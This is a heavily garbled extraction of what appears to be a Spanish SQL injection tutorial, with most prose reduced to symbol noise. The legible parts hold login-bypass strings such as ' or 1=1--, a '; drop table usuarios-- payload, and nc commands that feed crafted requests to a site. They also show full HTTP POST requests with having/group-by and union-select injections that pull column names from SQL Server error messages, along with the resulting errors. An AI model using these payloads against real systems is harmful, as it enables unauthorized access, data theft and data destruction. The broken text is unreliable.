!
! "
#$%& ' (
) " * + " ,-
# . / "0#$%
' " , *
) 1 % )" + ! " , *
, ") - **
2 #$% ' " - " "
3 #$% 4
) 5
, ! )
% " "
5 " 67" ) " " " . "
* 8* " ! 6 . "
. 5 9 " , # #$% 4
:) *
* + ;7 " /
# . ; , "
8< + " " = "
" " ) "
>; ) - " .>
5 " , "
4 ' " ; "
4 # ! " 8< # ! "
4 ! ' , *
? #$% 4 : " - " " , "
@ ' "
' " " A "
B * " + % " ' "
C ; "
A " " ' ) "
5. "
"" #
8 " )4 * " &
" 7 " " " ( D
# ) + = * 6 " " " " "
) & " + 6 9 & 6 & "
. " + " " .
! & 9 " " " " 6 ( " " "
. " & . " " 4 " " " "& "=
7 " + " ( " 7< " ) " . (( # +
2
; " " 6 " . " " .& 9 " ) ) * 9
* " " 6 ) + " " " ) "
5 . " & 7 " 6 (&
" " " . 4 #$%& " * " 9 " "
( " " " "
" $
! % & '
5 * " D C 2 . " " ) 4 ) " ) "
6 " . - ' & )4 6 " . 4
" * 9 " * " 9 " ) " " "& 9
" 9 ( " ) 4 ( ) "
& " * ) " * . "
4 " "
% " + 4 " . 4
#8$ 8% ># 8 . " $ + % . . > * 6
* 6 7 " D C & #8$ 8% +
* & 6 " . "& #$% E# $ + % . . F
! * " " " " D " & 9 - ( "
) " " ,- 9 " . &
9 . 4 #$% " 6 + = " " "
E#+) " & : + " * <F * 6 " "
51# CB@ + " #: * " CB
% . . = " 6 " " #$%BC + #$%C & " " )
4 " " " "& + .= . " 6 " " 6 " "
"
+& " D " " >! #$%> " 9 4 "
9 " " . 4 ) ) " 6 "
& ( 4 " " . " 4 " "= 9
. & 6 " " #$%2
" ) " " . 4 " . 6 "& 9 " +
9 " " " " 6 6 " 6 . 4
"
( ) * # +,
$ ( " " " " " ) " " " 9 - + " * &
) 4 ) 4 " " 9 " = " " = ,:# ! 9
"& 9 " * " & " ) ) 4 9 " 6 "
2 G " E, . * & " 6 " " " "
" " F& " * ) " D= " " ) " ) :# & " " " )
" ) " . " 6 " !' " "
%51
3
5 ) & " " C & 9 " " . ) " " "
( ) " ) & ) 9 . ) "
" 6 " 7 9 9 " )
4 & " 9 " ) * " " -
" . = " 6 6 " # & E! 9 "
) " 6 " 2F " 9 " * ) 4 = " *
9 " ) :# 2
% " 9 " 7" " " & +
) " " " ) " & " * * 9 - " . =
" :# " 9 " * & ) = )
9 " ) " :# 2 G " 1;
8 " " & " * ( ) 9 " 6
" " 6 & 9 = " . " 9 6
6 " .
' " & 6 " 9 " )= " #+) "
" - " , " 9 . :# +
" * G " 1;
, " * D CC = 6 " ) #0#$%& ) 4
) > " * #$% # 6 3 * G " 1;> H " & "
( = ( " " D CC2
, " " & 67" " " * #$%& " * "
6 " 6 " " " . E#$% F& 9 ( " . " "
" " " & " + CC? "
#$% @ " & " 9 " " " 9 6 "
#+) " G " 1;& + . #$%
CCB " * 0 " ) " .
. 6 " " "
5 ) . " & " * #$% " 6 " &
9 " " " " I ) & "
9 " ) " * " ) .
" - " , " ( #$% # 6 & " 6 ) "
9 " . " " & "
. " " "& " " " " 6 4 " "
" . " & 9 " " "
" " "& ) = " 4 6
" . . " " =" "
"- .# / ! 0
' 9 * & " " * &
* " 9 6 9 " " " * " +
9 " " "& " " " ) "
6 "& + " " #$% # 6 " < " .
?
# ) " ) + " " #$% ) " &
4 & * " " ) " " ) " " . 9
)6 ) = " ) 4 . & " 9
. " " & " 9 & "
& " + ) " ) 4 " E' "
" J " " " " #0#$% # 6 & 9 "
6 " " F
8 " " & " . " " ) " " 9 "
6 ) " " " " " " " #0#$% 9
" . & 6 6 " 9 "
. " )4 6 & " 7 " #$% 4
%# )
; . " & ". " *
" " " " + " 6 "& 9 4
" " #0#$%& " "* " * & 4
" " "& 9 ) " . 6 "
8 " #0#$% " . " "
>#5> + . " = " & "" * "
" > > E- KKF
8 " 9 . " = & 9 6
" #5 " ( . " " 6 4 " EIF " #0#$% # 6 &
) " " ) " " " & " ) 7 " " 6
" < " 6 . "& " 4 & " "
< "
( 1 ( * $# + )
#0#$% " < " " "& ) = " 1 % )"
6 L"& " 4 " "
. " " < " " ) 4 "
5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = "
" " ( 9 " 9 " " *
" " & " " " ;'! ! + 1 !
5 " + " 9 "
E8" F ( ) " " & " 6 #0#$%
# 6 & " " ;'! 332
5 ) " ) " I . " 9 .
" ) " + ) 4 "
6 " 9 " " "
+ * " " " " ) 9
" " ) " " " . & 9 " #0#$%
" & *
@
8 * 6 " ) " " = " " D "
6 #$% E! 4 #5 "" > >F " " " "
7 " + #$% " 9 6 " . "
& " 9 ) 7 "& " "
6 "& . ;:,:# " " " ) "
" 6 )
1
+ ( & ,#))
; , 6 % * " >; ! * . " *
#$% # 6 > O#$% # 6 " * " " " , ") "
- ** " " " > 8" " . * 9 1: < " 6 "& "
9 " " * * " + " "
6
P & " " " " 6= " 9 " "
" ,! " #$% # 6 " & "
) . " " " " " "
< "& 9 + " " ) < & " " "
" " 6 ) "
# ) " " " "
* " ") " ) ** #$%&
9 " " ) > M . 8< " G " >&
" ) " ") ) ** " ) " "
" " " >" 6Q * EF>
5 " < = " > M . 8< " G "
> E #-1 B303B 022CB0@F " " 9 (
< )
< Q M9
< Q " "
< Q <
< Q" "9 " +
< Q"9 .
< Q " "
< Q" 6
< Q " + "
< Q 6)
! -"""
" Q
" Q
" Q . +
" Q " +
" Q " +
"2 % & ,
; " ) & #$% " . 4 " " 5 "
" * " < " " " " " E!%0#$%
" : & ; " 0#$% " " * F "
6 "& < " . " " " "& . " "
" " & " * * " 6 (
" " " . "
% & +% + % ! .# . &
/ 51; ( . " "
8H:R8 ( 6 " "
,81S ( . "
% & ++ + + ) .# . &
' 85;8 ( 6 " ) "& " = "
, :! 8 ) " = "
5%;8
( * " ) " . . "
) * " "
% & + + #! .# . &
#8%8';
( " . " " ) " " 9
" "* .
1#8 ;
( . " " ) " "
J
!,5;8
( * " 6 " " " +
. " " " * "
,8%8;8
( . " " ) ) "
"
%! # #!
% " " " " " * ( " * " " 9
" "
%! # #!
A :
( " * ) " 6
" " . " "
G 8 8
( " * " " 9 )
" . " " 9 " 6 "
/ : ! -S
( " " . " " " "
. " " =* "
5H 1/
( < " 9 ) " "*
.
: ,8 -S
( " . " " " "
" *
B
3 % &
T 9
U + 9
TU , "
TV . 9
UV + . 9
V . 9
-8;G881 ( " * 6 6 "
% R8 (
1 ( " * . " " ) " "
4 & !
SELECT * FROM Tabla;
E8" " 6 6 " " " . " " ) >; ) >F
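-- Basic UPDATE example: sets the password column for the row(s) whose
-- user column equals 'admin'. The keyword was misspelled in the original
-- listing, so the statement would not have parsed.
-- NOTE(review): the example writes the password as a plain string; a real
-- schema should store a salted hash rather than the clear-text value.
UPDATE Tabla SET password = 'Juajuajua' WHERE user =
'admin'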
E8" " ( = "" " &
6 F
5 ) & " . 4 #$%& " * 9
4 " " "& " 9 " " * "
" " +
4 " #$% " & " "
" 4 " ! . * & = " "
* 4 " ) & " " " "
4 " " & 4
# ) " & " 6 " & " +
" " 9 6 " . "
& " " " 6 " 9 9
7 + #$% " " )
"5
#
# 6 7 " 9 . ( . * " 9 "& " .
" = " . " " >5 9 "
H ) " ' 8 >& " 9 * 6 & " " 9
" ) & & " " " #$% ) "&
C
" 6 " ) & )4 6 *
" " " = "
# ) " < 6 " " ) " "& "
6 " ) " . * & "
9 " " * " " 6 " 6
9 " . " 6 " " " <
+ . " " ) " " " " 6 )
5 " * " 4 . 4 J . " &
! " # " & " * "
" 9 . " " " 7 " " " 8
" & + )4 6 . .J
" " " & "
" ! " # & ) 4 " " . " "
0 8* " ! 6 . "
0 5 9 " , # #$% 4
0 :) *
0 8< + " " = "
0 ' " ; "
, " * & " 4 * 9 * + 9 .
) 4 " . " )4 6 " "
* " 6 "
( 6!
# ) 7 >#$% 4 > " ) J
) " " " * #0#$%& " 9 . "
9 " & " & 9
" " 9 )
. < 7<
8" " . * 9 " " ) " " " " " " 6
( " . " " * " 9 6 " " < " * "& "
9 & . " ". *
8" " 6 " " " =*
" " 9 + " " " G " * # 6 "
4 " ) " " 5#! ) " " " #0
#$%& " " " G " 9 *
" 6 " )
+ 4! $ (! &
5 9 " =" " 9 " "
" 6 ) & * " ( " " "
+ .= " " " < 7< "
8 9 + = " " " ) ) " ) 9
( 6 & " 9 ) 4 " "
" 9 " 9 " " " "
8" " ) 9 + = " " "& " 6 "
6 ) " "& ) "
" 6 " & " " 6 "
6 ) " " " " 6 " " 6 )& " 9
) 7 " * " " " ) " "
; " " " * " )& " " : % &
" " " & " " " " 6 "& + " ) * "
* " " 6 ) . " " ) "
+ " D
:M& " ) 6 " * + =
" " " " 9 " " . ) "
" ) M. & " . < " "
" + " " * " "
8 "& ) . ( ) " "
" ) .J " " " *
& 6 ( = " = " 6 " . " ) " .
"
<!-- Login form that submits with method=post to logon/logon.asp.
     NOTE(review): username= and password= are not standard <input>
     attributes, so this snippet looks schematic rather than literal markup.
     Whatever the server-side page receives from this form is untrusted and
     should reach the database only as bound parameters. -->
<FORM action=logon/logon.asp method=post>
<input type=hidden username=_UserName password=_Password>
</FORM>
8" * . . & ) " " " " . " " . 5#!
9 " " 6 " & ) " " E!
+ J " " ( ) * ; %& 9
. 5#! " < ) " "& .
" " " . " " * ; % + 6 6
" " F 8 * 6 + ) ) & * &
" . " " + 6 . "=
-- Login lookup template: _UserName and _Password are placeholders that
-- presumably stand for the values submitted by the login form.
-- NOTE(review): if those values are spliced into the statement text, the
-- input becomes part of the SQL itself. Bind both values as parameters
-- (prepared statement) and select only the columns that are needed.
select * from users where username = _UserName and
password = _Password
5 ) 9 " " " " & ( " " " . &
* " 6 " " " . "II ) " " "= + & " .
" " 6 6 4 & " " &
+ ) ) " " ) "
< " % " * " "
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
! " " & " % = ) " " "
" " 9 + " . "
" ) + ) " " " .= EN,F ) 7 " "
L1 6 ) L " " " 6 . 5#! 9
" 8 " " & + ) )
) 4 . . ) " " "
"* " " " . 9 * 6 " 6 . "
-- Lookup by edition; the literal 'Noviembre' presumably comes from the
-- "edicion" URL parameter of libreria.asp shown just before this query.
-- NOTE(review): a value taken from the URL is untrusted; pass it as a bound
-- parameter instead of building the WHERE clause by concatenation.
select * from numeros_anteriores where edicion =
'Noviembre'
" & " 9 ) " " " * " " ) "
#$% > 6 >& = " " 9 " . * 7 "
" . & + . " + " + 9 ) "
" " " " & " " " 9 +
#$%
5 6 " " " * " " 4 " " "
& " " ) " " + " ! & " " L
E' # F ( " " " )
" " ( ) 4 " ) +
.
% L E' # F " " * #$% # 6 *
"& " 9 " 6 9
" 4 " * " 9 6
& " 9 " " " " )
9 + #$%
H " 4 9 = " " " " " .
) ( * . " + )
" " " & "
Usuario : An'gel
Password : 338xD
select * from users where username = 'An'gel' and
password = '338xD'
select * from numeros_anteriores where edicion =
'N'oviembre'
8 ) " " " 9 " 9 " " " " " " "
#$% # 6 & " 9 " & " 9
" . " . ( " " +
" . "
username = 'An'
edicion = 'N'
% . & " . 9 " . " * "
"& #$%& * " ( & 4 "
" " & " 9 9 9 "
" " " + & " . * #$% # 6
5 ) 9 " = " " . + * . " 9
" " " L5 L + L1L II
8 " & . " " 6 " 9 9 " .J 6
6 67" ) " " + " " * "
" 4 " * " %& " " " ) "&
" " ( 6 & ( .
"
8" " * 6 & " 6 9 " " " " "
" " " )4 6 + ) 4 " " " " )"
" ) " " . " . & " " " " "
" " 6 "& " * " 9 " .
) " "
8 * 6 & 9 " " " . " " &
" " 6 6 . & ) ) . " .J . 7<
+ . )
A ) = " ) 7 & " " " " 6 "
& 9 " "
E84 " " ? >8 # 6 >F " 6 "
" ) 7 " " . & 9 + #$% " 6 ) " " 9 "&
9 " < 9 ) " " ) 4 + " (
7 " " " " ' " ' & " ) 4 > . #$%
# 6 " . #$% 4 > EH B * " + " "F
( ( 9 " " * .
6 ) " 9 " . " <
2
1 $ %
&
' (#)*
+! , - . , / %
0 ,
, 123
% &
- & ) " 6 9 * & " " " &
" ) " " " ) ) "
* " " " ) " " + "& . "
" I " + = " " "& + " 9 " .
& " ( .J ) " E! * >. . >F
) " " 9 " ." > . " > )
" " " . " " >% " ' ">
)4 6 6
6 7 ! 8 ( .
" 6 " " 7 " #$% 4 & " * 9 "
. " 9 " " "& 9 . " "
; %& 5#!& & " " " 6 ( 9 " < #$%
# 6 ' " 9 " ) "& "& .J "
6 ) & " & 4 & . " + ) 4 *
& 6 " " * " EH > % " ' ">F
# ) & " > 6 " > + = " " " = "
* " 6 & " " . 9 " ) ) + = " " " " "
9 & 4 & " " . " . " " "
) "=
8 " " & . " " 6 ) "
" 6 " # ) . " " " " ) "
* & 1: ) ) " & " " " " * " *
" " & " 6 " 6 "
" " ) E8" " ) "& ) 6= " "&
" ) 6 " + . F
9 ;:,5 * & 6 " " > "> " + J
9 " " " 6 ( " . 9 " )
! " " 6 " & . " =
& " ( . " 7 " " " 9 . * ) "
. " " 7 & "= ) 7 * 9 "
=
3
$ (! 6) $ (! ) & 3(
" " "
" " .= "& : 0%
! . " " & #
86 " : 0% & "
, " " +
* " .= & ! . "
" " " D " 9
" 6 " + ) " < "
" + * " " " "
" " " . *=
" "
"
- & 9 4 4 4
) " . "
4 " " " " " " " "
" ) "& 9
" "& " . "
" 6 "
* .
/ = " + "
5 " "
" " & )
) *
"& ) . " "
+ * "& " " ) 6 " "
"
! " " " . " . I ) & " 6 "
" * " "& " E> L >F * +
" 6 " * " ) 6 "
H 7 " " + .J " "
" " . " #$% = " " " * 9 "
" " . " " .
! " 9 + = " " " " "
* " ) * ; % 5#!& * " "
= " " 9 6 " 9 " " " 6 "& . "
# 5 : + !5##G: , " " .
. 5#! 9 ) " + 6 #$% ; ) 7 = "
" 9 * " " 6 #$% " < " "
. " " " 4 "
! 6 " 4 8" " * . < = " )
6 ) & . *=
---- Extracto -------------------------------------------
<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto -------------------------------------------
! " 9 * ( = & ; % " "& + "
4 . 5#! E! " " & . " " F
5 ) & " " 9 ) 4 ( . " " & "
9 6 " " " " " "&
" " " 9 * #$% " 6 " " ) "
) . 9 + " 6 " "
-- The login lookup with sample values filled in for username and password.
-- NOTE(review): comparing the submitted password directly in the WHERE
-- clause suggests passwords are stored in clear text (confirm against the
-- schema); verify a salted hash in application code and bind the username
-- as a parameter.
select * from users where username = 'Angel' and password
= '338xD'
! " " 9 " " + "" 9 . ) < "
) " " 9 ( " * 9 = 6
( 6
) " " ) * " "
) #$% 4 " I :M& 6 "
" * = " " + . "
" " + " D . " 'or 1=1—
Usuario : 'or 1=1--
! "" L V W
A 47 " "& 9 = " . ) +
.
select * from users where username = ' or 1=1-- and
password = ' or 1=1--
@
1 9 " 9 " < " " " >: > 9 " &
" " " 6 6 " 6 E " 6 " ) F &
. + = " " " " " " " . " "
1 ( ,
0 4
Usuario : 'OR''='
Password : 'OR''='
5
4/
' ) & " " 6 + 6 4 .
" > " ">& " " " > 00 > E, ) / F "
#$% ( & " "
"& #$% 9 . 9 6 .
. +
# ) " " 7 " . " 6 " 9 . "
< + " & " & " 6 "
& " ) "& " . "
" & ( " 6 .
# . 4 & " " " " " " 9 < "
" " )4 6 & .J " * >5 > > > " =
+ . "
Usuario : Admin'--
Password : 'or 1=1--
8 = & " 9 " " = " " " .
select * from users where username = 'Admin'-- and
password = ' or 1=1--
# " * "= + " . 4 & ) ) + "
.
8 " & " 6 " ) 6 " " " > L >
E' " F " " + > 00 > E, ) / F
6 9 " + " < "& " ) "
" " > " . "> 6 " ) "& 9 "
" " " .
) 4) # $ 7 ! . ! #
5 " " " " " * " <
#$% + . & " 6 " ) 9 6
6 . " " ) " * " " " " . 9
" "
' + = " 9 " " & . + & = "
* & ) 4 " > < " . > 9 " + * .
" + " " " " " "
! " 9 . E' + < " F& " " "
"& " " " " " . & . 9
9 " J " " ) " " "& + " 9 "
6 " " " & 4 & " 6
* " " " " " 6 " " "
" ) 4 & " 6 " 4 & " + *
" " " ) " < 6 . &
. " 9 " " " . "
" " 6
5 " * " " ) " * " " "& "
6 6 . " " ( " " "
9 D ) "9 " + *
" " * "
1 7 ! $ 7 ! . % #
"
' ; #$% # 6 & + " 6
" " 6 & " 6 . " " 6
##$%#8 H8 & " >
< > < Q "
) & " ) + > > " " "
" ) " " #$% # 6
)Q
) " ) " ) " " *
) ) "& 6 " )4 "& +
. ) " " *
" 1
) " " )4 " ) " "
" . " 8 4
" " " " " . * .J
8 " " "& "
" . * " " " " ) " +
6 " "
B
. 6 9# + &
% " 9 " , . # 6 & . & " " " D " &
" 6 " " " " " E' = " 5 F
" " E8 " " * 9 " 9 " .
) " = " & 4 " " 6
" ( + ( & F
5 * " " " " " 9 " 6 " " &
9 6 " & " .J ) . 6 9 J *
9 " & . 4 & " " " " 9
= . " " 6
8 6 " " & M " " *
" & 6 ) + #$%& = 4 & &
9 4 " " "
Usuario : '; drop table usuarios--
Password :
# * & " " 6 . "
* EH " >8* " ! 6 . " >F &
) ) ) > " "> " & 9 "
& .J " * " * "
' & + " " " & 6 "
6 ) ( " " & 6 5"= + &
" 9 , # " " " " 9 " .
7 " " ) "& 9 ) " ( & ) = "
+
1 $ % %
+ 67 & 4/
) . $
: 3( ) & ! #&
! ) ) " * " " " " (
7 " #$% 4 & " " " ) " 9 )
" " :,-' :%8 ,- 4 " #$% # 6 .
( D "
# ) " " 9 & " .
" & " " . 7< &
" " " E " 9 ) " " ( = &
. ) " 6 "& . " ) " 9
& + " " ) " " " * F
C
" 9 " " " 6 ) " + *
1 8 .1)
8 & " 9 6 ( " 6 " & 6 "
" " 6 " ) " " " 9 "
6 ) " "& . "
+ * & " " * 9 " <
" " 4 " " & + " " " 6 " "
" " + " 6 ( "
! " " " . 4 & " " " )
" > L > E' # F "
" D * " " .
Warning: SQL error: [Microsoft][ODBC SQL Server
Driver][SQL Server]Unclosed quotation mark before the
character string '')'., SQL state 37000 in SQLExecDirect
in php/db_odbc.inc on line 61 Database error: Invalid
SQL: Select * from usuario where (usuario.login=''')
ODBC Error: 1 (General Error (The ODBC interface cannot
return detailed error messages).) Session halted.
- & 6 " 9 * " < " :,-'
:)6 " " " * #$%
% < ) " " " . "
E > )Q ) >F
2 ! " * )Q ) & " 9 "
3 8 ) ) " " ( " > " >
? " " " " > . >
- & " 9 6 + " 6 " . * 9 +
. " " :,-' 8 )Q )
1 3
%
)
010.8#* - "3.9$
(")-#) :;<<
123
----- Fragmento -----------------------------------------
<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
* Modified by XXXXXXXXXXXXXXXXXXXX
(XXXXXX@XXXXX.XXX)
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class DB_Sql {
var $Host = "";
var $Database = "";
var $User = "";
var $Password = "";
var $UseODBCCursor = 0;
var $Link_ID = 0;
var $Query_ID = 0;
var $Record = array();
var $Row = 0;
var $Errno = 0;
var $Error = "";
----- Fragmento -----------------------------------------
- " " " " >" " > 6 " "
6 " " 6 ) " X " + X! "" " "
. & " 9 " ( " " " . " " 6 " " " "
* & . " 6 4 * . 9 "
* & " "& 9 * 9 9 6 " #$%&
A " + 6 & " " . " 6 "
" " . " " < 9 " 6 "
* " " " ) E8 " " = ) "
)Q ) F
: ) & * / !
:M& 6 " " 9 + #$% + "
* 6 " ) " " ) "
"& * .
+ " " " ) 9 4 * "
+ . & " 9 4 " " ) " 6 +
.
8 " " 6 " " " " ( &
" ( 7 " #$% 4 & "
"
! " 9 " 6 " " " * & . "
6 4 6 " " & " " 9 "
" ) "& J " " ( 9 " "
" ) " " ) < 9 6 7 " ;;! " 6
"
# " + ) " " ' % E8 M
" " B * " + % " ' "F&
9 " " " ) 4 E5 . 6 &
" . F " . . = "
- " 9 " 6 " " " " 6 " * "
7 " ;;! " )4 6 & " < " "& (
9 D " 6 " < & " " " 6
< & " . *
nc -vv www.objetivo.com 80 < sentencias.txt
' "
' + " * " " ;;! *
& ( " ** * E8 " " * # +1 & "
8 9 F& . . " ) )4 6 . "
) " + " D " * " E5 . ) " " " F& " 6
" "
8" * "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Angel&txtPassword=Angel
Y Y
Y H . " >! "" >
Y * . "
Y
H . " > " >
* . "
- & " . 9 " " * !:#; )
" " ** 6 < 9 4 < & " "
) " " " .
! " 9 " " . + " ) 9 " "
" " ) " + ) > L > E' " F
* & 6 6 " & )
( " ) " * ) ( 6
* ! " " 6 " " " " " " #$% 9
" " E 6 .& . )+& F
8 )4 6 " " ( > > " " ' " "
" " > "> #$%& " * " 6 " * " 9
6 9 #$% E 4 6 < & " 4
:%8 ,-F ) " " " " )" 6 "& " 4 " * 6 "
" 6 " "
H 6 " " " 4 < 6 " " " * "
( " 7 !:#; 9 " ( " 6= (
" ) 4 6
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
2
1 .
$ " =
3 )*1(
5*'>
! ) 6 " " " . " " " 6 !:#;& " 9 "
" " ) " > "> " " " " ;;!
% ) " " ( * " "
9 6 " 6 "
! + 4
 ' # Z
] ! + ' Z2-
, " ! " Z25
O O 8" [ Z
V # . . Z2,
& ' Z '
E ! 7 " " Z B
F ! 7 " " Z C
U + Z28
T Z2'
5 )
!
[ " Z -
0 " 0
^ - M # " Z?'
Q " Q
:MK 9 " ( " 4 < & " " " " (
" 6= & + 6 9 " ! " 6 "
6 = 9 " 6= " "
" 9 " 6 " 9 " & + 6 " 9 "
" " " " )
8 "
nc -vv www.objetivo.com 80 < Injection.txt > result.html
- 6 " 9 " 9 . " " + > 6 .>&
) " 6 " * " 9 4 " "
! " " " & . " & " 7
* " 9 " " * " )
" " " " + "
H " 9 4 " "
3
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! * KK " " " & " )" 6 9
" 4 " & 6 :,-' #$% # 6 " 6 6 )
) ) " " ( * " " . .
E # 5 :#F& "= ) 7 " E " ,F
5 9 " ) ) & " * " = &
" 6 6 " " * 4 < + ( " " * "
" "& " " " ) # 5 :#
H " 9 = " * " 6 !:#;
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. "
H + L. )+ " " " , 6 . V 00
% . 4 6 " = & 6 " " .
"
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
6 ( " " " & " 9 " " > 6 .>
" 6 ( " >. )+> " )
+ " , ) # 5 :#& " " ,
# . " .= & " " " " " +
" " 9 ) # 5 :# ( "
> . " > * " " "& "
> 6 > " ) " + 8" " =
*
'group by usuarios.UserID,usuarios.UID having 1=1--
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
@
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1--
#! ! *
HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date:
Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23
GMT Connection: close Location: PaginaPersonal.asp
Content-Length: 139 Content-Type: text/html Set-Cookie:
xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US
ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private
Object Moved
This object may be found here.
:M 9 =& " )" 6 " + )
" . > " " 8 > 8 9
" " 9 & ) " . * ) " . "
> > " ( " #8%8'; . E/ " 1
F A=4 " 9 " " !:#; ;;! 1: " & " 9
" " " 6 . " " " "
) " "& 4 6 9 #$% 6
+
E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8
6 . V 00F
, " & " " 9 & * "
* " " " " ) &
( " " " . "
' & . " " " " " . " 9 ;:,:# " "
) " " #8%8'; . & " "&
9 + 9 " " " " #8%8'; " + 9 *
" " II 6 " 4 < " #
9 " * " " .
SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x
AND campo5=y
( 7 E8" " >. )+> + > 6 .>F "
) = " " ) " > >& > > + > 2>&
" ) = " < " > ?> E, * " " 9 "
. * >#8%8'; _ A : ` a> " = " & " * )
" + " " " 7 F " " " " " "
) ( . " "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1--
&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
Y
H + "L " ) & & & * "+" )4 " & "+" "
) V) VL " "L ) E" )
* "+" )4 " & "+" " ) V) VL " "L
)+ " F )+ 00
- 9 " " " III H "& ( " +
> "> = ) " 9 " " # * " (
" " . & " "
+ % . " 1 :1 " . + 9
" " " & " " " " ) " " "
#S#:-b8';# + #S#':% 1# " > ,> * 9
" ) " 6 (
" ;:! E8 " " F % " " " (
1 6 9 " " 6 " #8%8';
7 " "& "= * 9 ) 6 " "
B
4 ;:!& " 9 . " "
;:,:# " " ) )4 6 "
!:#; 6 ;:! F
% " 9 = " ) " " " . " "
" &
Ups' union select b.name,1,1,1 from sysobjects a,
syscolumns b where a.id=b.id and a.name='usuarios' and
